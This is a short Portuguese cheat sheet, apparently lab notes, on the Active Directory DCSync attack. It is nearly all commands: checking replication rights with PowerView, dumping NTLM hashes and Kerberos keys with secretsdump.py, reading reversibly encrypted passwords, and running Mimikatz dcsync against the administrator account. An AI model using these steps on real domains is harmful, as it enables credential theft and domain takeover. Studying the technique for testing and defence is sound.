DCSync
O DCSync é uma técnica para roubar o banco de dados de senhas do Active Directory usando o , que é usado pelos controladores de domínio para replicar dados de domínio. Isso permite que um invasor imite um controlador de domínio para recuperar hashes de senha NTLM do usuário.Directory Replication Service Remote Protocol
Usando Get-DomainUser para exibir a associação de grupo do adunn
Get-DomainUser -Identity adunn |select samaccountname,objectsid,memberof,useraccountcontrol |fl
Usando Get-ObjectAcl para verificar os direitos de replicação do adunn
$sid= "S-1-5-21-3842939050-3880317879-2865463114-1164"
Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl
Extraindo hashes NTLM e chaves Kerberos usando secretsdump.py
secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5
Listando hashes, chaves Kerberos e senhas de texto não criptografado
ls inlanefreight_hashes*
Enumerando ainda mais usando Get-ADUser
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
Verificando a opção de criptografia reversível usando Get-DomainUser
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
Exibindo a senha descriptografada
cat inlanefreight_hashes.ntds.cleartext
Usando runas.exe
runas /netonly /user:INLANEFREIGHT\adunn powershell
Realizando o ataque com Mimikatz
.\mimikatz.exe
mimikatz #privilege::debug
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
Last updated